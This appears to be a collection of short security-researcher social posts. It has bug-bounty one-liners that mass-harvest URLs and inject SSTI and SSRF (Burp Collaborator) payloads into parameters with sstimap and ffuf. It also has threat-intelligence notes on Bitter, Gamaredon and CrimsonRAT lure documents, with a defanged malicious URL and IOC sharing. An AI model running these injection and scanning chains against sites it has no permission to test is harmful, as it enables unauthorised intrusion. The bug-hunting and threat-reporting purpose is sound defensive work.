Web vulnerability mining SSTI vulnerability sudo waybackurls target.com|grep -Ev "\.(jpeg|jpg|png|ico|js|css|svg|ttf|eot|woff|webp)$" | qsreplace "ssti{{9*9}}" > fuzz.txt for url in $(cat fuzz.txt); do python3 sstimap.py -u $url; print $url; done

One command to get ssrf mining gau --subs xxx.com | gf ssrf | sort -u | httpx -mc 200 | qsreplace "burpcollaborator" >> ssrfuzzxxx.txt; ffuf -c -w ssrfuzzxxx.txt -u FUZZ happy hunting everyone😄 🇸🇦 Murtada Bin Abdullah (Rood) Justin Gardner zseano H1 Disclosed - Public Disclosures H4x0r.DZ N$

The two commands help you complete sensitive information mining, which is suitable for large-scale batch methods. gau x.com --subs | cut -d"?" -f1 | grep -E "\.js+(?:on|)$" | tee urls.txt ffuf -w urls.txt:HFUZZ -u HFUZZ -replay-proxy http://burpip:port

Bitter APT Attack sample，The bait is a chm file, the content is to let everyone report crimes using the Internet chm->cmd->powershell->schtasks->dowwnload jpg->exec command Guess the collection target in the early stage, and then accurately change the pic.jpg command control

APT Gamaredon The content of the document is a forged document of "Electronic Trust Service of the Shastinska Regional Electricity Administration of Ukraine" наказ_в_дпов_дальної особи.doc http]://principles67.vilitord.ru/BUDGET/stoppage56/rejoice/already[.]mkv can't access

Web security, bug hunting and sharing of online monitoring methods for subdomain takeover. Can also detect malicious IOC indicators takeover.cyberint.com

Received manufacturer reward bounty yesterday

zhixiang hao Kornelij Narek Babajanyan🇦🇲 thank you for pointing us to this, we've done some additional research and will release more details soon cyberhub.am/en/blog/2023/0…

Our Threat Hunter Team has discovered a few more IOCs relating to publicly reported attacks against airport and security targets in Armenia. (Documented here: x.com/HaoZhixiang/st… and here cyberhub.am/en/blog/2023/0…) (1 of 5)

It is estimated to be an attack targeting India. The content of the malicious DOCM document is the mathematics, science and technology content of the University of Madrid in India.The VBA code will be executed when opened, and the bin file is embedded in the document. CrimsonRAT